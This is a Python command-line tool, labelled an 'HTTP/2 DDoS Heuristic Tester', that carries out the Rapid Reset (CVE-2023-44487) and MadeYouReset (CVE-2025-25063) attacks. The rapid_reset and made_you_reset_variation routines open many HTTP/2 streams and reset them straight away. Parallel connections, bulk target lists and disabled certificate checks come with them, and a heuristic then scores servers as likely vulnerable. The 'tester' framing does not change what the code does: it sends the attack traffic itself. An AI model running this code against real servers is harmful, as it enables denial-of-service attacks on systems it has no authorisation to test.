441 lines
17 KiB
Python
441 lines
17 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import argparse
|
|
import ssl
|
|
import socket
|
|
import time
|
|
from urllib.parse import urlparse
|
|
from datetime import datetime
|
|
import json
|
|
import csv
|
|
|
|
from h2.config import H2Configuration
|
|
from h2.connection import H2Connection
|
|
from h2.events import (
|
|
SettingsAcknowledged, ConnectionTerminated,
|
|
PingAckReceived, WindowUpdated, RemoteSettingsChanged
|
|
)
|
|
from colorama import Fore, Style, init
|
|
init(autoreset=True)
|
|
|
|
def print_banner():
|
|
banner = f"""
|
|
{Fore.CYAN}{Style.BRIGHT}
|
|
|
|
|
|
╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐
|
|
║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤ │
|
|
╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴
|
|
{Style.RESET_ALL}
|
|
"""
|
|
print(banner)
|
|
print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-25063 ]{Style.RESET_ALL}\n")
|
|
print(f"{Fore.WHITE}[ m10sec@proton.me | m10sec 2025 ]{Style.RESET_ALL}\n")
|
|
def check_http2_support(host, port=443, tls=True, timeout=5.0):
|
|
"""Devuelve True si el host negocia HTTP/2 vía ALPN."""
|
|
try:
|
|
raw = socket.create_connection((host, port), timeout=timeout)
|
|
if tls:
|
|
ctx = ssl.create_default_context()
|
|
ctx.set_alpn_protocols(["h2", "http/1.1"]) # aceptar h2
|
|
ctx.check_hostname = False
|
|
ctx.verify_mode = ssl.CERT_NONE
|
|
s = ctx.wrap_socket(raw, server_hostname=host)
|
|
proto = s.selected_alpn_protocol()
|
|
s.close()
|
|
return proto == "h2"
|
|
else:
|
|
raw.close()
|
|
return False
|
|
except Exception:
|
|
return False
|
|
|
|
|
|
class H2Client:
|
|
def __init__(self, host, port, tls=True, server_name=None, timeout=6.0):
|
|
self.host = host
|
|
self.port = port
|
|
self.tls = tls
|
|
self.server_name = server_name or host
|
|
self.timeout = timeout
|
|
self.sock = None
|
|
self.conn = None
|
|
self.metrics = {
|
|
"goaway": 0,
|
|
"goaway_codes": [],
|
|
"rst_sent": 0,
|
|
"rst_rate_per_s": 0.0,
|
|
"streams_opened": 0,
|
|
"pings": 0,
|
|
"ping_rtt_ms": [],
|
|
"remote_max_concurrent_streams": None,
|
|
"throttled": False,
|
|
"errors": []
|
|
}
|
|
|
|
def _wrap_tls(self, raw):
|
|
ctx = ssl.create_default_context()
|
|
ctx.set_alpn_protocols(["h2"]) # Forzar ALPN h2
|
|
ctx.check_hostname = False
|
|
ctx.verify_mode = ssl.CERT_NONE # Cambia a CERT_REQUIRED
|
|
return ctx.wrap_socket(raw, server_hostname=self.server_name)
|
|
|
|
def connect(self):
|
|
raw = socket.create_connection((self.host, self.port), timeout=self.timeout)
|
|
self.sock = self._wrap_tls(raw) if self.tls else raw
|
|
self.sock.settimeout(self.timeout)
|
|
cfg = H2Configuration(client_side=True, header_encoding="utf-8")
|
|
self.conn = H2Connection(config=cfg)
|
|
self.conn.initiate_connection()
|
|
self._send(self.conn.data_to_send())
|
|
self._drain()
|
|
|
|
def close(self):
|
|
try:
|
|
self.sock.close()
|
|
except Exception:
|
|
pass
|
|
|
|
def _send(self, data: bytes):
|
|
if not data:
|
|
return
|
|
self.sock.sendall(data)
|
|
|
|
def _drain(self, dur=0.01):
|
|
end = time.time() + dur
|
|
while time.time() < end:
|
|
try:
|
|
data = self.sock.recv(65535)
|
|
if not data:
|
|
break
|
|
events = self.conn.receive_data(data)
|
|
for ev in events:
|
|
if isinstance(ev, ConnectionTerminated):
|
|
self.metrics["goaway"] += 1
|
|
self.metrics["goaway_codes"].append(ev.error_code)
|
|
if ev.error_code in (0xb, 0x1): # ENHANCE_YOUR_CALM / PROTOCOL_ERROR
|
|
self.metrics["throttled"] = True
|
|
elif isinstance(ev, RemoteSettingsChanged):
|
|
mcs = ev.changed_settings.get(0x3) # SETTINGS_MAX_CONCURRENT_STREAMS
|
|
if mcs:
|
|
self.metrics["remote_max_concurrent_streams"] = mcs.new_value
|
|
elif isinstance(ev, PingAckReceived):
|
|
try:
|
|
sent_ns = int.from_bytes(ev.ping_data, "big")
|
|
rtt_ms = (time.time_ns() - sent_ns) / 1e6
|
|
self.metrics["ping_rtt_ms"].append(rtt_ms)
|
|
except Exception:
|
|
self.metrics["ping_rtt_ms"].append(-1)
|
|
self._send(self.conn.data_to_send())
|
|
except socket.timeout:
|
|
break
|
|
except Exception as e:
|
|
self.metrics["errors"].append(str(e))
|
|
break
|
|
|
|
def ping(self):
|
|
from hyperframe.frame import PingFrame
|
|
pf = PingFrame(0)
|
|
pf.opaque_data = int(time.time_ns()).to_bytes(8, "big")
|
|
self._send(pf.serialize())
|
|
self.metrics["pings"] += 1
|
|
self._drain(0.2)
|
|
|
|
def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0):
|
|
"""CVE-2023-44487 baseline: abre streams y los resetea inmediatamente."""
|
|
headers_base = [
|
|
(":method", "GET"),
|
|
(":authority", authority),
|
|
(":scheme", "https" if self.tls else "http"),
|
|
(":path", path),
|
|
("user-agent", "h2-check/rr")
|
|
]
|
|
if header_extra:
|
|
headers_base.extend(header_extra)
|
|
|
|
start = time.time()
|
|
for _ in range(n_streams):
|
|
sid = self.conn.get_next_available_stream_id()
|
|
self.conn.send_headers(sid, headers_base, end_stream=True)
|
|
# Cierra vía state machine de hyper-h2
|
|
self.conn.reset_stream(sid, error_code=0x8) # CANCEL
|
|
self._send(self.conn.data_to_send())
|
|
self.metrics["rst_sent"] += 1
|
|
self.metrics["streams_opened"] += 1
|
|
self._drain(0.0)
|
|
if pace_s:
|
|
time.sleep(pace_s)
|
|
dur = max(0.001, time.time() - start)
|
|
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
|
|
self._drain(0.5)
|
|
|
|
def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2):
|
|
"""CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST."""
|
|
import random
|
|
headers_base = [
|
|
(":method", "GET"),
|
|
(":authority", authority),
|
|
(":scheme", "https" if self.tls else "http"),
|
|
(":path", path),
|
|
("user-agent", "h2-check/myr")
|
|
]
|
|
start = time.time()
|
|
for i in range(n_streams):
|
|
sid = self.conn.get_next_available_stream_id()
|
|
self.conn.send_headers(sid, headers_base, end_stream=False)
|
|
self._send(self.conn.data_to_send())
|
|
time.sleep(random.uniform(0, jitter_ms/1000.0))
|
|
self.conn.reset_stream(sid, error_code=0x8)
|
|
self._send(self.conn.data_to_send())
|
|
self.metrics["rst_sent"] += 1
|
|
self.metrics["streams_opened"] += 1
|
|
if i % 20 == 0:
|
|
self.ping()
|
|
self._drain(0.0)
|
|
dur = max(0.001, time.time() - start)
|
|
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
|
|
self._drain(0.8)
|
|
|
|
def classify(metrics):
|
|
go_enhance = any(code == 0xb for code in metrics["goaway_codes"])
|
|
high_rate = metrics["rst_rate_per_s"] > 500
|
|
no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or
|
|
(metrics["remote_max_concurrent_streams"] and metrics["remote_max_concurrent_streams"] > 1000))
|
|
rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0)
|
|
|
|
if not metrics["goaway"] and no_limits and high_rate and rtt_spikes:
|
|
verdict = "LIKELY_VULN"
|
|
elif not go_enhance and (high_rate or no_limits):
|
|
verdict = "POSSIBLE"
|
|
else:
|
|
verdict = "UNLIKELY"
|
|
return verdict
|
|
|
|
def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0):
|
|
"""Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico."""
|
|
u = urlparse(target_url)
|
|
tls = (u.scheme == "https")
|
|
port = u.port or (443 if tls else 80)
|
|
authority = u.netloc.split(":")[0]
|
|
|
|
http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout)
|
|
|
|
result = {
|
|
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
|
|
"URL": target_url if u.scheme else f"https://{authority}",
|
|
"HTTP/2 Support": "Yes" if http2_supported else "No",
|
|
"Vulnerable": "UNKNOWN",
|
|
"Details": "No se pudo completar el análisis"
|
|
}
|
|
|
|
if not http2_supported:
|
|
result["Details"] = "El servidor no negoció HTTP/2 (ALPN)."
|
|
return result
|
|
|
|
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout)
|
|
try:
|
|
c.connect()
|
|
if mode in ("rapid", "both"):
|
|
c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace)
|
|
if mode in ("myr", "both"):
|
|
c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter)
|
|
verdict = classify(c.metrics)
|
|
mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"}
|
|
result["Vulnerable"] = mapping.get(verdict, verdict)
|
|
result["Details"] = (
|
|
f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
|
|
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
|
|
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']}"
|
|
)
|
|
except Exception as e:
|
|
result["Vulnerable"] = "UNKNOWN"
|
|
result["Details"] = f"Error durante prueba: {e}"
|
|
finally:
|
|
c.close()
|
|
|
|
return result
|
|
|
|
|
|
def _normalize_target(s: str) -> str:
|
|
s = (s or "").strip()
|
|
if not s:
|
|
return s
|
|
if not s.startswith("http"):
|
|
s = "https://" + s
|
|
return s
|
|
|
|
|
|
def interactive_menu():
|
|
print("\n=== HTTP/2 DDoS Heuristic Tester ===")
|
|
print("1) CVE-2023-44487 (Rapid Reset)")
|
|
print("2) CVE-2025-25063 (MadeYouReset)")
|
|
print("3) Ambos (comparativa)")
|
|
print("4) Salir")
|
|
choice = input("Selecciona opción [1-4]: ").strip() or "2"
|
|
if choice not in {"1","2","3"}:
|
|
print("Saliendo.")
|
|
return
|
|
|
|
target = _normalize_target(input("Target (https://dominio o http://ip): ").strip())
|
|
if not target:
|
|
print("No se ingresó target. Saliendo.")
|
|
return
|
|
|
|
try:
|
|
streams = int((input("Streams por conexión [200]: ") or "200").strip())
|
|
except Exception:
|
|
streams = 200
|
|
try:
|
|
jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip())
|
|
except Exception:
|
|
jitter = 2
|
|
|
|
mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both")
|
|
summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter)
|
|
print(json.dumps(summary, ensure_ascii=False, indent=2))
|
|
|
|
def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0,
|
|
out_json=None, out_csv=None, line_by_line=True):
|
|
"""Lee un archivo TXT con un target por línea y escanea cada uno.
|
|
- Imprime 1 línea por resultado (NDJSON) para no saturar la salida.
|
|
- Si se especifica out_json, guarda un array JSON con todos los resultados.
|
|
- Si se especifica out_csv, guarda CSV con columnas fijas.
|
|
"""
|
|
results = []
|
|
try:
|
|
with open(path, "r", encoding="utf-8") as f:
|
|
lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")]
|
|
except Exception as e:
|
|
print(f"[!] No pude leer '{path}': {e}")
|
|
return
|
|
|
|
for target in lines:
|
|
target_url = _normalize_target(target)
|
|
try:
|
|
res = scan_for_vulnerability(target_url, mode=mode, streams=streams,
|
|
timeout=timeout, jitter=jitter, pace=pace)
|
|
except Exception as e:
|
|
res = {
|
|
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
|
|
"URL": target_url,
|
|
"HTTP/2 Support": "UNKNOWN",
|
|
"Vulnerable": "UNKNOWN",
|
|
"Details": f"Error general: {e}"
|
|
}
|
|
results.append(res)
|
|
if line_by_line:
|
|
print(json.dumps(res, ensure_ascii=False))
|
|
|
|
if out_json:
|
|
try:
|
|
with open(out_json, "w", encoding="utf-8") as jf:
|
|
json.dump(results, jf, ensure_ascii=False, indent=2)
|
|
print(f"[+] Guardado JSON en {out_json}")
|
|
except Exception as e:
|
|
print(f"[!] No pude guardar JSON en {out_json}: {e}")
|
|
|
|
if out_csv:
|
|
try:
|
|
with open(out_csv, "w", encoding="utf-8", newline="") as cf:
|
|
writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"])
|
|
writer.writeheader()
|
|
for r in results:
|
|
writer.writerow(r)
|
|
print(f"[+] Guardado CSV en {out_csv}")
|
|
except Exception as e:
|
|
print(f"[!] No pude guardar CSV en {out_csv}: {e}")
|
|
|
|
|
|
# -----------------------------
|
|
# Punto de entrada
|
|
# -----------------------------
|
|
|
|
|
|
def main():
|
|
print_banner()
|
|
|
|
|
|
|
|
ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker")
|
|
ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)")
|
|
ap.add_argument("--path", default="/", help="Ruta a solicitar")
|
|
ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr",
|
|
help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both")
|
|
ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas")
|
|
ap.add_argument("--streams", type=int, default=200, help="Streams por conexión")
|
|
ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket")
|
|
ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)")
|
|
ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)")
|
|
ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)")
|
|
ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo")
|
|
ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)")
|
|
ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON")
|
|
ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV")
|
|
args = ap.parse_args()
|
|
|
|
# Agrego Bulk
|
|
if args.targets_file:
|
|
bulk_scan_from_txt(
|
|
args.targets_file,
|
|
mode=args.mode,
|
|
streams=args.streams,
|
|
timeout=args.timeout,
|
|
jitter=args.jitter,
|
|
pace=args.pace,
|
|
out_json=args.out_json,
|
|
out_csv=args.out_csv,
|
|
line_by_line=True,
|
|
)
|
|
return
|
|
|
|
# se activa el menu
|
|
if args.menu or not args.target:
|
|
interactive_menu()
|
|
return
|
|
|
|
u = urlparse(args.target)
|
|
tls = (u.scheme == "https")
|
|
port = u.port or (443 if tls else 80)
|
|
authority = u.netloc.split(":")[0]
|
|
|
|
if args.json:
|
|
summary = scan_for_vulnerability(
|
|
args.target,
|
|
mode=args.mode,
|
|
streams=args.streams,
|
|
timeout=args.timeout,
|
|
jitter=args.jitter,
|
|
pace=args.pace
|
|
)
|
|
print(json.dumps(summary, ensure_ascii=False, indent=2))
|
|
return
|
|
|
|
clients = []
|
|
for _ in range(args.conns):
|
|
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout)
|
|
c.connect()
|
|
clients.append(c)
|
|
|
|
try:
|
|
for c in clients:
|
|
if args.mode in ("rapid", "both"):
|
|
c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace)
|
|
if args.mode in ("myr", "both"):
|
|
c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter)
|
|
|
|
print("\n=== Resultados ===")
|
|
for i, c in enumerate(clients, 1):
|
|
v = classify(c.metrics)
|
|
print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
|
|
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
|
|
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
|
|
f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])}")
|
|
finally:
|
|
for c in clients:
|
|
c.close()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|